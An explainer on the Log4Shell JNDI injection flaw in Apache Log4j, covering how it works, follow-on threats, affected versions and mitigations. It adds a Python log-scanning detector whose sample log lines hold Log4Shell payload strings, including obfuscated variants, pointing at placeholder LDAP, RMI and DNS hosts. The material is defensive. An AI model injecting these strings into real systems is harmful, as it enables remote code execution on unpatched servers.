What is the Apache Log4j (Log4Shell) Vulnerability?



Overview of the Log4Shell Vulnerability

In 2021, a critical vulnerability was patched in the widely used Java-based logging library Apache Log4j. Officially designated CVE-2021-44228, this security flaw carries a severity score of 10 out of 10 on the Common Vulnerability Scoring System (CVSS) v3.1 scale.

The vulnerability was initially reported to Apache on November 24, 2021. On December 9, 2021, Log4Shell was publicly disclosed, and an initial fix was released in version 2.15.0 of Apache Log4j.

Subsequent reports of attacks in the wild prompted several national cybersecurity agencies to issue warnings, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the UK National Cyber Security Centre (NCSC), and the Canadian Centre for Cyber Security. Because Apache Log4j is so widely deployed, millions of devices are at risk.


How Log4Shell Works

Log4Shell is a Java Naming and Directory Interface™ (JNDI) injection vulnerability that allows remote code execution (RCE). An attacker gets untrusted data (such as a malicious payload) into a log message processed by an affected Apache Log4j version; the library performs a JNDI lookup on that data and connects to an attacker-controlled server. The result: complete access to your system from anywhere in the world.

Since JNDI lookups support various directory types, such as the Domain Name Service (DNS), the Lightweight Directory Access Protocol (LDAP), Remote Method Invocation (RMI), and the Internet Inter-ORB Protocol (IIOP), all of which expose valuable information, Log4Shell can lead to follow-on threats such as the following:


Cryptocurrency Mining: Attackers can utilize your resources for cryptocurrency mining. Given the substantial computational power required to run cloud services and applications, this threat can become highly costly.

Distributed Denial of Service (DDoS): This threat lets attackers shut down or disable a network, website, or service so that the targeted organization can no longer access it.

Ransomware: After achieving Remote Code Execution (RCE), attackers can gather and encrypt data for the purpose of ransom.

A potential infection chain is shown below:

[Figure: potential Log4Shell infection chain]


Vulnerable Products, Applications, and Plugins

Essentially, any internet-connected device running Apache Log4j versions 2.0 through 2.14.1 is affected. Affected applications include Apache Struts, Apache Solr, Apache Druid, Apache Dubbo, Elasticsearch, and VMware vCenter.

Patching and Mitigation

To address the vulnerability, Apache initially released Apache Log4j version 2.15.0. However, this version only worked with Java 8, so those on earlier Java versions had to rely on temporary mitigations and reapply them as guidance changed. As of the time of writing, Apache has released version 2.16.0 and advises users to promptly update any potentially affected libraries.

Other mitigation strategies, such as virtual patching and the use of Intrusion Detection/Prevention Systems (IDS/IPS), are highly recommended. Virtual patching prevents the exploitation of the vulnerability, while IDS/IPS monitors inbound and outbound traffic for suspicious behavior.
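As an added example (not code from the original post or from Trend Micro), the following Python detector illustrates the kind of log inspection an IDS/IPS or log-monitoring rule performs for the JNDI lookup injection described above: it reduces the nested Log4j-style lookups used to disguise a JNDI reference and flags the log lines that contain one. The sample log lines and hostnames are constructed for the example.

```python
import re

# Log4j 2 resolves ${...} lookups inside log messages. A plain substring match for
# "jndi:" misses payloads hidden behind nested lookups such as ${lower:J} or ${::-j},
# so we reduce those lookups to their literal text first, then match.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")          # innermost lookup (no nesting inside)
JNDI_REF = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nis|nds):", re.IGNORECASE)

def resolve(m: "re.Match[str]") -> str:
    """Reduce one innermost lookup to the literal text it would contribute."""
    body = m.group(1)
    if body.lower().startswith("jndi:"):      # keep the JNDI reference so it can be matched
        return m.group(0)
    if ":-" in body:                           # ${anything:-default} yields its default value
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    if prefix.lower() in ("lower", "upper"):   # ${lower:X} / ${upper:X} yield X
        return arg
    return ""                                  # env, sys, date, ... add no attacker literal

def normalize(line: str, max_rounds: int = 20) -> str:
    """Strip nested obfuscation lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        reduced = LOOKUP.sub(resolve, line)
        if reduced == line:
            break
        line = reduced
    return line

def is_jndi_probe(line: str) -> bool:
    return JNDI_REF.search(normalize(line)) is not None

def scan(lines):
    """Return the indices of log lines carrying a JNDI lookup reference."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]

# Constructed web-server access log lines (User-Agent is a common injection point).
SAMPLE_LOG = [
    '203.0.113.7 - - "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET /login" 200 "${jndi:ldap://lookup.example:1389/a}"',
    '203.0.113.9 - - "GET /" 200 "${${lower:j}ndi:${lower:rmi}://lookup.example:1099/x}"',
    '203.0.113.10 - - "GET /" 200 "${${::-j}${env:NOPE:-n}di:dns://lookup.example/x}"',
    '203.0.113.11 - - "GET /" 200 "price is ${date:yyyy} dollars"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(f"line {i}: suspected Log4Shell probe -> {normalize(SAMPLE_LOG[i])}")
```

The last sample line shows that a benign-looking lookup without a JNDI reference is not flagged, which keeps the rule from firing on ordinary log content.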


Sources:
1. Trend Micro
2. https://nvd.nist.gov/vuln/detail/CVE-2021-44228
3. https://nvd.nist.gov/vuln/detail/CVE-2021-45046
4. https://nvd.nist.gov/vuln/detail/CVE-2021-45105
